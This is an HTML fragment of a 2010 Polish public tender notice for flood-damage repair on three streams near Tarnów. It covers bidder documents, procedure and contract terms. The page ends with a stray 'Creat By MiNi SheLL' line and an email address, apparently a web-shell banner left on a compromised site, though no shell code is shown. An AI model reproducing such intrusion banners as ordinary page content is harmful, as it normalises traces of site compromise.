<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Nie przewiduje się wzrostu cen przedstawionych w kosztorysie ofertowym, jak również  możliwości zmian składników cenotwórczych  podanych w ofercie bez względu na zaistniałą  w międzyczasie sytuację za wyjątkiem stawki podatku VAT, którego zmiana następuje z mocy prawa.
2.	Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku:
- konieczności udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy pzp, których wykonanie rzutuje na termin wykonania zamówienia podstawowego
- zdarzeń losowych tj. podtopienia placu budowy spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót.
- zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na harmonogram.
3.	Dopuszcza się zmianę treści umowy zawartej z Wykonawcą tylko w następujących przypadkach:
- zmiany kluczowego personelu wykonawcy, zamawiającego lub podwykonawcy
- zmiany adresu wykonawcy, zamawiającego lub podwykonawcy
- zmiany w KRS lub wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia
- zmiany kont bankowych
- zmiany formy zabezpieczenia należytego wykonania umowy zgodnie z art. 149 ustawy pzp
- wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego w Inspektoracie Rejonowym w Tarnowie, ul. Ostrogskich 5, pok. nr 19..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2010 godzina 09:30, miejsce: w siedzibie MZMiUW w Tarnowie przy ul. Ostrogskich 5, w sekretariacie pok. nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usuwanie szkód powodziowych na pot. Wątok w km 4+150 - 4+300 w m. Tarnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres planowanych robót winien uwzględniać:
km. 4+150-4+300 potoku Wątok
1/  roboty przygotowawcze
- pomiary geodezyjne
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ roboty zabezpieczeniowe
- roboty ziemne pod planowane budowle
- wykonanie opaski do wys. Min. 2,0 m z gabionów zalanych betonem, posadowionych na ławie betonowej poniżej dna min 0,7 m,
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą lub gabionów min. 2 szt.
- wykonanie narzutów kamiennych podwodnych w dnie i za gurtami 
3/ roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usuwanie szkód powodziowych na pot. Olszynka w km 15+180 - 15+280 w m. Szerzyny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres planowanych robót winien uwzględniać:
km. 15+180 - 15+280 Olszynka
1/  roboty przygotowawcze
- pomiary geodezyjne
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ roboty zabezpieczeniowe
- roboty ziemne pod planowane budowle
- wykonanie opasek z koszy siatkowo-kamiennych, gabionów lub materacy maccaferri do wys. min. 1,5 m
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą min. 4 szt.
- wykonanie wyściółek faszynowych w dnie
- wykonanie narzutów kamiennych nadwodnych, podwodnych w dnie i za gurtami 
3/ roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usuwanie szkód powodziowych na pot. Szczepanowski w km 1+280 - 2+680 w m. Szczepanowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres planowanych robót winien uwzględniać:
1/  Rozbiórka zatorów z koryta potoku w km 1+280 - 2+680
2/ Roboty przygotowawcze na odcinku w km 2+570 -2+670
- pomiary geodezyjne
- wycinka drze
- wycinka zakrzaczeń (z karczowaniem)
- usuwanie zatorów w korycie potoku
- przygotowanie dróg technologicznych ( z rozbiórką)
2/ Roboty zabezpieczeniowe prawej skarpy potoku na odcinku w km 2+570 - 2+670
- roboty ziemne pod planowane budowle
- wykonanie opaski z koszy siatkowo-kamiennych z obetonowaniem do wys. min. 2,0 m
- wykonanie gurtów z koszy siatkowo-kamiennych z palisadą min. 4 szt.
- wykonanie wyściółek faszynowych w dnie
- wykonanie narzutów kamiennych nadwodnych, podwodnych w dnie i za gurtami 
3/ Roboty wykończeniowe
- plantowanie skarp i terenu przyległego 
- obsiew mieszanką traw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com